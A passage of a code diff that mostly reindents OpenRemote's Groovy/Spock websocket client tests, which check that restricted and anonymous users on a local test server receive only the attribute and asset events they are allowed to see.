+    then: "the linked targetTemperature attribute should contain this written value (it should have been written to the target temp attribute and then read back again)"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.getId(), true)
+      assert asset.getAttribute("readWriteTargetTemp").flatMap{
+        it.getValue()
+      }.orElse(null) == 19.5d
     }
+
+    when: "the co2level changes"
+    def co2LevelIncrement = new AttributeEvent(
+            managerTestSetup.apartment1LivingroomId, "co2Level", 600
+            )
+    ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(co2LevelIncrement)
+
+    then: "the linked co2Level attribute should get the new value"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.getId(), true)
+      assert asset.getAttribute("readCo2Level").flatMap{it.getValue()}.orElse(null) == 600d
+    }
+
+    cleanup: "disable mock filter"
+    mockServer.finished = true
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/websocket/WebsocketClientTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/websocket/WebsocketClientTest.groovy
@@ -65,471 +65,505 @@ import static org.openremote.model.util.MapAccess.getString
  */
 class WebsocketClientTest extends Specification implements ManagerContainerTrait {
 
-    protected static <T> T messageFromString(String message) {
-        try {
-            def isSubscription = message.startsWith(EventSubscription.SUBSCRIBED_MESSAGE_PREFIX)
-            def isTriggered = !isSubscription && message.startsWith(TriggeredEventSubscription.MESSAGE_PREFIX)
-            message = message.substring(message.indexOf(":")+1)
-            return ValueUtil.JSON.readValue(message, isSubscription ? EventSubscription.class : isTriggered ? TriggeredEventSubscription.class : SharedEvent.class)
-        } catch (Exception e) {
-            throw new IllegalArgumentException("Unable to parse message")
-        }
+  protected static <T> T messageFromString(String message) {
+    try {
+      def isSubscription = message.startsWith(EventSubscription.SUBSCRIBED_MESSAGE_PREFIX)
+      def isTriggered = !isSubscription && message.startsWith(TriggeredEventSubscription.MESSAGE_PREFIX)
+      message = message.substring(message.indexOf(":")+1)
+      return ValueUtil.JSON.readValue(message, isSubscription ? EventSubscription.class : isTriggered ? TriggeredEventSubscription.class : SharedEvent.class)
+    } catch (Exception e) {
+      throw new IllegalArgumentException("Unable to parse message")
+    }
+  }
+
+  protected static String messageToString(String prefix, Object message) {
+    try {
+      String str = ValueUtil.asJSON(message).orElse(null)
+      return prefix + str
+    } catch (Exception e) {
+      throw new IllegalArgumentException("Unable to serialise message")
+    }
+  }
+
+  def "Check restricted client"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "a simple Websocket client with restricted user"
+    def client = new WebsocketIOClient<String>(
+            new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=building").build(),
+            null,
+            new OAuthPasswordGrant("http://127.0.0.1:$serverPort/auth/realms/building/protocol/openid-connect/token",
+            KEYCLOAK_CLIENT_ID,
+            null,
+            null,
+            "testuser3",
+            "testuser3"))
+    client.setEncoderDecoderProvider({
+      [
+        new StringEncoder(CharsetUtil.UTF_8),
+        new StringDecoder(CharsetUtil.UTF_8),
+        new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)
+      ].toArray(new ChannelHandler[0])
+    })
+
+    and: "another Websocket client with another restricted user"
+    def client2 = new WebsocketIOClient<String>(
+            new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=building").build(),
+            null,
+            new OAuthPasswordGrant("http://127.0.0.1:$serverPort/auth/realms/building/protocol/openid-connect/token",
+            KEYCLOAK_CLIENT_ID,
+            null,
+            null,
+            "building",
+            "building"))
+    client2.setEncoderDecoderProvider({
+      [
+        new StringEncoder(CharsetUtil.UTF_8),
+        new StringDecoder(CharsetUtil.UTF_8),
+        new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client2)
+      ].toArray(new ChannelHandler[0])
+    })
+
+    and: "another Websocket client with no credentials"
+    def client3 = new WebsocketIOClient<String>(
+            new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=building").build(),
+            null, null)
+    client3.setEncoderDecoderProvider({
+      [
+        new StringEncoder(CharsetUtil.UTF_8),
+        new StringDecoder(CharsetUtil.UTF_8),
+        new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client3)
+      ].toArray(new ChannelHandler[0])
+    })
+
+    and: "we add callback consumers to the clients"
+    def connectionStatus = client.getConnectionStatus()
+    def connectionStatus2 = client2.getConnectionStatus()
+    def connectionStatus3 = client3.getConnectionStatus()
+    List<Object> receivedMessages = new CopyOnWriteArrayList<>()
+    List<Object> receivedMessages2 = new CopyOnWriteArrayList<>()
+    List<Object> receivedMessages3 = new CopyOnWriteArrayList<>()
+    client.addMessageConsumer({
+      getLOG().info("Client1 message received: $it")
+      receivedMessages.add(messageFromString(it))
+    })
+    client.addConnectionStatusConsumer({
+      getLOG().info("Client1 status change: $it")
+      connectionStatus = it
+    })
+    client2.addMessageConsumer({
+      getLOG().info("Client2 message received: $it")
+      receivedMessages2.add(messageFromString(it))
+    })
+    client2.addConnectionStatusConsumer({
+      getLOG().info("Client2 status change: $it")
+      connectionStatus2 = it
+    })
+    client3.addMessageConsumer({
+      getLOG().info("Client3 message received: $it")
+      receivedMessages3.add(messageFromString(it))
+    })
+    client3.addConnectionStatusConsumer({
+      getLOG().info("Client3 status change: $it")
+      connectionStatus3 = it
+    })
+
+    and: "the system settles down"
+    noEventProcessedIn(assetProcessingService, 500)
+
+    when: "we call connect on the clients"
+    client.connect()
+    client2.connect()
+    client3.connect()
+
+    then: "the clients status should become CONNECTED"
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatus == ConnectionStatus.CONNECTED
+      assert client2.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatus2 == ConnectionStatus.CONNECTED
+      assert client3.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatus3 == ConnectionStatus.CONNECTED
     }
 
-    protected static String messageToString(String prefix, Object message) {
-        try {
-            String str = ValueUtil.asJSON(message).orElse(null)
-            return prefix + str;
-        } catch (Exception e) {
-            throw new IllegalArgumentException("Unable to serialise message");
-        }
-    }
-
-    def "Check restricted client"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-
-        and: "a simple Websocket client with restricted user"
-        def client = new WebsocketIOClient<String>(
-                new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=building").build(),
-                null,
-                new OAuthPasswordGrant("http://127.0.0.1:$serverPort/auth/realms/building/protocol/openid-connect/token",
-                        KEYCLOAK_CLIENT_ID,
-                        null,
-                        null,
-                        "testuser3",
-                        "testuser3"))
-        client.setEncoderDecoderProvider({
-            [
-                new StringEncoder(CharsetUtil.UTF_8),
-                new StringDecoder(CharsetUtil.UTF_8),
-                new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)
-            ].toArray(new ChannelHandler[0])
-        })
-
-        and: "another Websocket client with another restricted user"
-        def client2 = new WebsocketIOClient<String>(
-                new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=building").build(),
-                null,
-                new OAuthPasswordGrant("http://127.0.0.1:$serverPort/auth/realms/building/protocol/openid-connect/token",
-                        KEYCLOAK_CLIENT_ID,
-                        null,
-                        null,
-                        "building",
-                        "building"))
-        client2.setEncoderDecoderProvider({
-            [
-                    new StringEncoder(CharsetUtil.UTF_8),
-                    new StringDecoder(CharsetUtil.UTF_8),
-                    new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client2)
-            ].toArray(new ChannelHandler[0])
-        })
-
-        and: "another Websocket client with no credentials"
-        def client3 = new WebsocketIOClient<String>(
-                new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=building").build(),
-                null, null)
-        client3.setEncoderDecoderProvider({
-            [
-                    new StringEncoder(CharsetUtil.UTF_8),
-                    new StringDecoder(CharsetUtil.UTF_8),
-                    new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client3)
-            ].toArray(new ChannelHandler[0])
-        })
-
-        and: "we add callback consumers to the clients"
-        def connectionStatus = client.getConnectionStatus()
-        def connectionStatus2 = client2.getConnectionStatus()
-        def connectionStatus3 = client3.getConnectionStatus()
-        List<Object> receivedMessages = new CopyOnWriteArrayList<>()
-        List<Object> receivedMessages2 = new CopyOnWriteArrayList<>()
-        List<Object> receivedMessages3 = new CopyOnWriteArrayList<>()
-        client.addMessageConsumer({
-            getLOG().info("Client1 message received: $it")
-            receivedMessages.add(messageFromString(it))
-        })
-        client.addConnectionStatusConsumer({
-            getLOG().info("Client1 status change: $it")
-            connectionStatus = it
-        })
-        client2.addMessageConsumer({
-            getLOG().info("Client2 message received: $it")
-            receivedMessages2.add(messageFromString(it))
-        })
-        client2.addConnectionStatusConsumer({
-            getLOG().info("Client2 status change: $it")
-            connectionStatus2 = it
-        })
-        client3.addMessageConsumer({
-            getLOG().info("Client3 message received: $it")
-            receivedMessages3.add(messageFromString(it))
-        })
-        client3.addConnectionStatusConsumer({
-            getLOG().info("Client3 status change: $it")
-            connectionStatus3 = it
-        })
-
-        and: "the system settles down"
-        noEventProcessedIn(assetProcessingService, 500)
-
-        when: "we call connect on the clients"
-        client.connect()
-        client2.connect()
-        client3.connect()
-
-        then: "the clients status should become CONNECTED"
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatus == ConnectionStatus.CONNECTED
-            assert client2.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatus2 == ConnectionStatus.CONNECTED
-            assert client3.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatus3 == ConnectionStatus.CONNECTED
-        }
-
-        when: "we subscribe to attribute events produced by the server"
-        client.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-                new EventSubscription(
-                        AttributeEvent.class,
-                        null,
-                        "attributes")))
-        client2.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-                new EventSubscription(
-                        AttributeEvent.class,
-                        null,
-                        "attributes2")))
-        client3.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-                new EventSubscription(
-                        AttributeEvent.class,
-                        null,
-                        "attributes3")))
-
-        and: "we subscribe to asset events produced by the server"
-        client.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-                new EventSubscription(
-                        AssetEvent.class,
-                        null,
-                        "assets")))
-        client2.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-                new EventSubscription(
-                        AssetEvent.class,
-                        null,
-                        "assets2")))
-        client3.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
-                new EventSubscription(
-                        AssetEvent.class,
-                        null,
-                        "assets3")))
-
-        then: "the server should confirm the subscriptions"
-        conditions.eventually {
-            assert receivedMessages.size() == 2
-            assert receivedMessages.any {it instanceof EventSubscription && it.subscriptionId == "attributes"}
-            assert receivedMessages.any {it instanceof EventSubscription && it.subscriptionId == "assets"}
-            assert receivedMessages2.size() == 2
-            assert receivedMessages2.any {it instanceof EventSubscription && it.subscriptionId == "attributes2"}
-            assert receivedMessages2.any {it instanceof EventSubscription && it.subscriptionId == "assets2"}
-            assert receivedMessages3.size() == 2
-            assert receivedMessages3.any {it instanceof EventSubscription && it.subscriptionId == "attributes3"}
-            assert receivedMessages3.any {it instanceof EventSubscription && it.subscriptionId == "assets3"}
-        }
-
-        when: "apartment 1 living room temp changes"
-        receivedMessages.clear()
-        receivedMessages2.clear()
-        receivedMessages3.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 5))
-
-        then: "the testuser3 client receives the event"
-        conditions.eventually {
-            assert receivedMessages.size() == 1
-            TriggeredEventSubscription triggeredEvent = receivedMessages[0] as TriggeredEventSubscription
-            assert triggeredEvent.subscriptionId == "attributes"
-            assert triggeredEvent.events.size() == 1
-            assert ((AttributeEvent) triggeredEvent.events[0]).id == managerTestSetup.apartment1LivingroomId
-            assert ((AttributeEvent) triggeredEvent.events[0]).name == "targetTemperature"
-            assert ((AttributeEvent) triggeredEvent.events[0]).value.orElse(0) == 5
-        }
-
-        then: "the building user should not have received the event"
-        conditions.eventually {
-            assert receivedMessages2.isEmpty()
-        }
-
-        and: "the anonymous user should not have received the event"
-        conditions.eventually {
-            assert receivedMessages3.isEmpty()
-        }
-
-        when: "apartment 2 living room temp changes"
-        receivedMessages.clear()
-        receivedMessages2.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment2LivingroomId, "targetTemperature", 15))
-
-        then: "the building client receives the event"
-        conditions.eventually {
-            assert receivedMessages2.size() == 1
-            TriggeredEventSubscription triggeredEvent = receivedMessages2[0] as TriggeredEventSubscription
-            assert triggeredEvent.subscriptionId == "attributes2"
-            assert triggeredEvent.events.size() == 1
-            assert ((AttributeEvent) triggeredEvent.events[0]).id == managerTestSetup.apartment2LivingroomId
-            assert ((AttributeEvent) triggeredEvent.events[0]).name == "targetTemperature"
-            assert ((AttributeEvent) triggeredEvent.events[0]).value.orElse(0) == 15
-        }
-
-        then: "the testuser3 user should not have received the event"
-        assert receivedMessages.isEmpty()
-
-        when: "apartment 1 living room asset is modified"
-        receivedMessages.clear()
-        receivedMessages2.clear()
-        receivedMessages3.clear()
-        def apartment1Livingroom = assetStorageService.find(managerTestSetup.apartment1LivingroomId)
-        apartment1Livingroom.addAttributes(
-                new Attribute<>("testAttribute", ValueType.BOOLEAN).addOrReplaceMeta(
-                        new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ, false),
-                        new MetaItem<>(MetaItemType.ACCESS_PUBLIC_READ, false)
-                )
-        )
-        apartment1Livingroom.getAttribute(Asset.NOTES).get().addOrReplaceMeta(
-                new MetaItem<>(MetaItemType.ACCESS_PUBLIC_READ)
-        )
-        apartment1Livingroom = assetStorageService.merge(apartment1Livingroom)
-
-        then: "the testuser3 client should be notified with only accessible attributes"
-        conditions.eventually {
-            assert receivedMessages.size() == 2
-            def attrSub = receivedMessages.find{it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes"} as TriggeredEventSubscription<AttributeEvent>
-            def assetSub = receivedMessages.find{it instanceof TriggeredEventSubscription && it.subscriptionId == "assets"} as TriggeredEventSubscription<AssetEvent>
-            assert assetSub != null
-            assert assetSub.events.size() == 1
-            assert assetSub.events.get(0).id == managerTestSetup.apartment1LivingroomId
-            assert assetSub.events.get(0).attributeNames.size() == 8
-            assert !assetSub.events.get(0).attributeNames.contains("testAttribute")
-            assert attrSub != null
-            assert attrSub.events.size() == 1
-            assert attrSub.events.get(0).id == managerTestSetup.apartment1LivingroomId
-            assert attrSub.events.get(0).name == Asset.NOTES.name
-        }
-
-        and: "the anonymous client should be notified with only accessible attributes"
-        conditions.eventually {
-            assert receivedMessages3.size() == 2
-            def attrSub = receivedMessages3.find{it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes3"} as TriggeredEventSubscription<AttributeEvent>
-            def assetSub = receivedMessages3.find{it instanceof TriggeredEventSubscription && it.subscriptionId == "assets3"} as TriggeredEventSubscription<AssetEvent>
-            assert assetSub != null
-            assert assetSub.events.size() == 1
-            assert assetSub.events.get(0).id == managerTestSetup.apartment1LivingroomId
-            assert assetSub.events.get(0).attributeNames.size() == 1
-            assert assetSub.events.get(0).attributeNames.contains(Asset.NOTES.name)
-            assert attrSub != null
-            assert attrSub.events.size() == 1
-            assert attrSub.events.get(0).id == managerTestSetup.apartment1LivingroomId
-            assert attrSub.events.get(0).name == Asset.NOTES.name
-        }
-
-        and: "the building user should not have received the event"
-        assert receivedMessages2.isEmpty()
-
-        when: "apartment 1 asset is modified"
-        receivedMessages.clear()
-        receivedMessages2.clear()
-        receivedMessages3.clear()
-        def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id)
-        apartment1.getAttribute(Asset.LOCATION).get().setValue(new GeoJSONPoint(10, 10))
-        apartment1.getAttribute(BuildingAsset.STREET).get().setValue("Test Street")
-        apartment1 = assetStorageService.merge(apartment1)
-
-        then: "the testuser3 client should be notified with only accessible attributes"
-        conditions.eventually {
-            assert receivedMessages.size() == 3
-            def attr1Sub = receivedMessages.find{it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes" && it.events.any {((AttributeEvent)it).ref.name==BuildingAsset.STREET.name}} as TriggeredEventSubscription<AttributeEvent>
-            def attr2Sub = receivedMessages.find{it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes" && it.events.any {((AttributeEvent)it).ref.name==Asset.LOCATION.name}} as TriggeredEventSubscription<AttributeEvent>
-            def assetSub = receivedMessages.find{it instanceof TriggeredEventSubscription && it.subscriptionId == "assets"} as TriggeredEventSubscription<AssetEvent>
-            assert assetSub != null
-            assert assetSub.events.size() == 1
-            assert assetSub.events.get(0).id == managerTestSetup.apartment1Id
-            assert assetSub.events.get(0).attributeNames.size() == 8
-            assert assetSub.events.get(0).attributeNames.contains(BuildingAsset.STREET.name)
-            assert attr1Sub != null
-            assert attr1Sub.events.size() == 1
-            assert attr1Sub.events.get(0).id == managerTestSetup.apartment1Id
-            assert attr1Sub.events.get(0).name == BuildingAsset.STREET.name
-            assert attr2Sub != null
-            assert attr2Sub.events.size() == 1
-            assert attr2Sub.events.get(0).id == managerTestSetup.apartment1Id
-            assert attr2Sub.events.get(0).name == Asset.LOCATION.name
-        }
-
-        then: "the anonymous client should be notified with only accessible attributes"
-        conditions.eventually {
-            assert receivedMessages3.size() == 2
-            def attrSub = receivedMessages3.find{it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes3"} as TriggeredEventSubscription<AttributeEvent>
-            def assetSub = receivedMessages3.find{it instanceof TriggeredEventSubscription && it.subscriptionId == "assets3"} as TriggeredEventSubscription<AssetEvent>
-            assert assetSub != null
-            assert assetSub.events.size() == 1
-            assert assetSub.events.get(0).id == managerTestSetup.apartment1Id
-            assert assetSub.events.get(0).attributeNames.size() == 1
-            assert assetSub.events.get(0).attributeNames.contains(Asset.LOCATION.name)
-            assert attrSub != null
-            assert attrSub.events.size() == 1
-            assert attrSub.events.get(0).id == managerTestSetup.apartment1Id
-            assert attrSub.events.get(0).name == BuildingAsset.LOCATION.name
-        }
-
-        and: "the building user should not have received the event"
-        assert receivedMessages2.isEmpty()
-
-        cleanup: "the server should be stopped"
-        if (client != null) {
-            client.disconnect()
-        }
-        if (client2 != null) {
-            client2.disconnect()
-        }
-        if (client3 != null) {
-            client3.disconnect()
-        }
-    }
-
-    def "Check client"() {
-
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 20, delay: 0.2)
-
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-
-        and: "a simple Websocket client"
-        def client = new WebsocketIOClient<String>(
-                new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=master").build(),
-                null,
-                new OAuthPasswordGrant("http://127.0.0.1:$serverPort/auth/realms/master/protocol/openid-connect/token",
-                    KEYCLOAK_CLIENT_ID,
-                    null,
-                    null,
-                    MASTER_REALM_ADMIN_USER,
-                    getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)))
-        client.setEncoderDecoderProvider({
-            [new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)].toArray(new ChannelHandler[0])
-        })
-
-        and: "we add callback consumers to the client"
-        def connectionStatus = client.getConnectionStatus()
-        List<String> receivedMessages = new CopyOnWriteArrayList<>()
-        client.addMessageConsumer(
-            message -> receivedMessages.add(messageFromString(message))
-        )
-        client.addConnectionStatusConsumer({
-            status -> connectionStatus = status
-        })
-
-        and: "the system settles down"
-        noEventProcessedIn(assetProcessingService, 500)
-
-        when: "we call connect on the client"
-        client.connect()
-
-        then: "the client status should become CONNECTED"
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatus == ConnectionStatus.CONNECTED
-        }
-
-        // TODO: Remove this once client supports some better connection logic
-        and: "some time passes to allow the connection to be fully initialised"
-        sleep(3000)
-
-        when: "we subscribe to attribute events produced by the server"
-        client.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+    when: "we subscribe to attribute events produced by the server"
+    client.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
             new EventSubscription(
-                AttributeEvent.class,
-                new AssetFilter<AttributeEvent>().setAssetIds(managerTestSetup.apartment1LivingroomId),
-                "1")))
+                    AttributeEvent.class,
+                    null,
+                    "attributes")))
+    client2.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+            new EventSubscription(
+                    AttributeEvent.class,
+                    null,
+                    "attributes2")))
+    client3.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+            new EventSubscription(
+                    AttributeEvent.class,
+                    null,
+                    "attributes3")))
 
-        then: "the server should return a subscribed event"
-        conditions.eventually {
-            assert receivedMessages.size() == 1
-            EventSubscription subscription = receivedMessages[0] as EventSubscription
-            assert subscription != null
-            assert subscription.subscriptionId == "1"
-        }
+    and: "we subscribe to asset events produced by the server"
+    client.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+            new EventSubscription(
+                    AssetEvent.class,
+                    null,
+                    "assets")))
+    client2.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+            new EventSubscription(
+                    AssetEvent.class,
+                    null,
+                    "assets2")))
+    client3.sendMessage(messageToString(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX,
+            new EventSubscription(
+                    AssetEvent.class,
+                    null,
+                    "assets3")))
 
-        when: "when apartment 1 living room temp changes"
-        receivedMessages.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 5))
-
-        then: "the client receives the event"
-        conditions.eventually {
-            assert receivedMessages.size() == 1
-            TriggeredEventSubscription triggeredEvent = receivedMessages[0] as TriggeredEventSubscription
-            assert triggeredEvent.subscriptionId == "1"
-            assert triggeredEvent.events.size() == 1
-            assert ((AttributeEvent)triggeredEvent.events[0]).id == managerTestSetup.apartment1LivingroomId
-            assert ((AttributeEvent)triggeredEvent.events[0]).name == "targetTemperature"
-            assert ((AttributeEvent)triggeredEvent.events[0]).value.orElse(0) == 5
-        }
-
-        when: "when apartment 1 living room temp is set to the same value again"
-        receivedMessages.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 5))
-
-        then: "the client should receive the event"
-        conditions.eventually {
-            assert receivedMessages.size() == 1
-            TriggeredEventSubscription triggeredEvent = receivedMessages[0] as TriggeredEventSubscription
-            assert triggeredEvent.subscriptionId == "1"
-            assert triggeredEvent.events.size() == 1
-            assert ((AttributeEvent)triggeredEvent.events[0]).id == managerTestSetup.apartment1LivingroomId
-            assert ((AttributeEvent)triggeredEvent.events[0]).name == "targetTemperature"
-            assert ((AttributeEvent)triggeredEvent.events[0]).value.orElse(0) == 5
-        }
-
-        when: "when apartment 1 living room temp is set to null"
-        receivedMessages.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", null))
-
-        then: "the client receives the event"
-        conditions.eventually {
-            assert receivedMessages.size() == 1
-            TriggeredEventSubscription triggeredEvent = receivedMessages[0] as TriggeredEventSubscription
-            assert triggeredEvent.subscriptionId == "1"
-            assert triggeredEvent.events.size() == 1
-            assert ((AttributeEvent)triggeredEvent.events[0]).id == managerTestSetup.apartment1LivingroomId
-            assert ((AttributeEvent)triggeredEvent.events[0]).name == "targetTemperature"
-            assert !((AttributeEvent)triggeredEvent.events[0]).value.isPresent()
-        }
-
-        when: "when apartment 1 bathroom temp changes"
-        receivedMessages.clear()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1BathroomId, "targetTemperature", 10))
-
-        then: "the bathroom target temp should have changed"
-        conditions.eventually {
-            def bathroom = assetStorageService.find(managerTestSetup.apartment1BathroomId)
-            assert bathroom.getAttribute("targetTemperature").flatMap{it.value}.orElse(0d) == 10d
-        }
-
-        and: "the client should not have received the event"
-        conditions.eventually {
-            assert receivedMessages.isEmpty()
-        }
-
-        cleanup: "the server should be stopped"
-        if (client != null) {
-            client.disconnect()
-        }
+    then: "the server should confirm the subscriptions"
+    conditions.eventually {
+      assert receivedMessages.size() == 2
+      assert receivedMessages.any {
+        it instanceof EventSubscription && it.subscriptionId == "attributes"
+      }
+      assert receivedMessages.any {
+        it instanceof EventSubscription && it.subscriptionId == "assets"
+      }
+      assert receivedMessages2.size() == 2
+      assert receivedMessages2.any {
+        it instanceof EventSubscription && it.subscriptionId == "attributes2"
+      }
+      assert receivedMessages2.any {
+        it instanceof EventSubscription && it.subscriptionId == "assets2"
+      }
+      assert receivedMessages3.size() == 2
+      assert receivedMessages3.any {
+        it instanceof EventSubscription && it.subscriptionId == "attributes3"
+      }
+      assert receivedMessages3.any {
+        it instanceof EventSubscription && it.subscriptionId == "assets3"
+      }
     }
+
+    when: "apartment 1 living room temp changes"
+    receivedMessages.clear()
+    receivedMessages2.clear()
+    receivedMessages3.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 5))
+
+    then: "the testuser3 client receives the event"
+    conditions.eventually {
+      assert receivedMessages.size() == 1
+      TriggeredEventSubscription triggeredEvent = receivedMessages[0] as TriggeredEventSubscription
+      assert triggeredEvent.subscriptionId == "attributes"
+      assert triggeredEvent.events.size() == 1
+      assert ((AttributeEvent) triggeredEvent.events[0]).id == managerTestSetup.apartment1LivingroomId
+      assert ((AttributeEvent) triggeredEvent.events[0]).name == "targetTemperature"
+      assert ((AttributeEvent) triggeredEvent.events[0]).value.orElse(0) == 5
+    }
+
+    then: "the building user should not have received the event"
+    conditions.eventually {
+      assert receivedMessages2.isEmpty()
+    }
+
+    and: "the anonymous user should not have received the event"
+    conditions.eventually {
+      assert receivedMessages3.isEmpty()
+    }
+
+    when: "apartment 2 living room temp changes"
+    receivedMessages.clear()
+    receivedMessages2.clear()
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment2LivingroomId, "targetTemperature", 15))
+
+    then: "the building client receives the event"
+    conditions.eventually {
+      assert receivedMessages2.size() == 1
+      TriggeredEventSubscription triggeredEvent = receivedMessages2[0] as TriggeredEventSubscription
+      assert triggeredEvent.subscriptionId == "attributes2"
+      assert triggeredEvent.events.size() == 1
+      assert ((AttributeEvent) triggeredEvent.events[0]).id == managerTestSetup.apartment2LivingroomId
+      assert ((AttributeEvent) triggeredEvent.events[0]).name == "targetTemperature"
+      assert ((AttributeEvent) triggeredEvent.events[0]).value.orElse(0) == 15
+    }
+
+    then: "the testuser3 user should not have received the event"
+    assert receivedMessages.isEmpty()
+
+    when: "apartment 1 living room asset is modified"
+    receivedMessages.clear()
+    receivedMessages2.clear()
+    receivedMessages3.clear()
+    def apartment1Livingroom = assetStorageService.find(managerTestSetup.apartment1LivingroomId)
+    apartment1Livingroom.addAttributes(
+            new Attribute<>("testAttribute", ValueType.BOOLEAN).addOrReplaceMeta(
+                    new MetaItem<>(MetaItemType.ACCESS_RESTRICTED_READ, false),
+                    new MetaItem<>(MetaItemType.ACCESS_PUBLIC_READ, false)
+                    )
+            )
+    apartment1Livingroom.getAttribute(Asset.NOTES).get().addOrReplaceMeta(
+            new MetaItem<>(MetaItemType.ACCESS_PUBLIC_READ)
+            )
+    apartment1Livingroom = assetStorageService.merge(apartment1Livingroom)
+
+    then: "the testuser3 client should be notified with only accessible attributes"
+    conditions.eventually {
+      assert receivedMessages.size() == 2
+      def attrSub = receivedMessages.find{
+        it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes"
+      } as TriggeredEventSubscription<AttributeEvent>
+      def assetSub = receivedMessages.find{
+        it instanceof TriggeredEventSubscription && it.subscriptionId == "assets"
+      } as TriggeredEventSubscription<AssetEvent>
+      assert assetSub != null
+      assert assetSub.events.size() == 1
+      assert assetSub.events.get(0).id == managerTestSetup.apartment1LivingroomId
+      assert assetSub.events.get(0).attributeNames.size() == 8
+      assert !assetSub.events.get(0).attributeNames.contains("testAttribute")
+      assert attrSub != null
+      assert attrSub.events.size() == 1
+      assert attrSub.events.get(0).id == managerTestSetup.apartment1LivingroomId
+      assert attrSub.events.get(0).name == Asset.NOTES.name
+    }
+
+    and: "the anonymous client should be notified with only accessible attributes"
+    conditions.eventually {
+      assert receivedMessages3.size() == 2
+      def attrSub = receivedMessages3.find{
+        it instanceof TriggeredEventSubscription && it.subscriptionId == "attributes3"
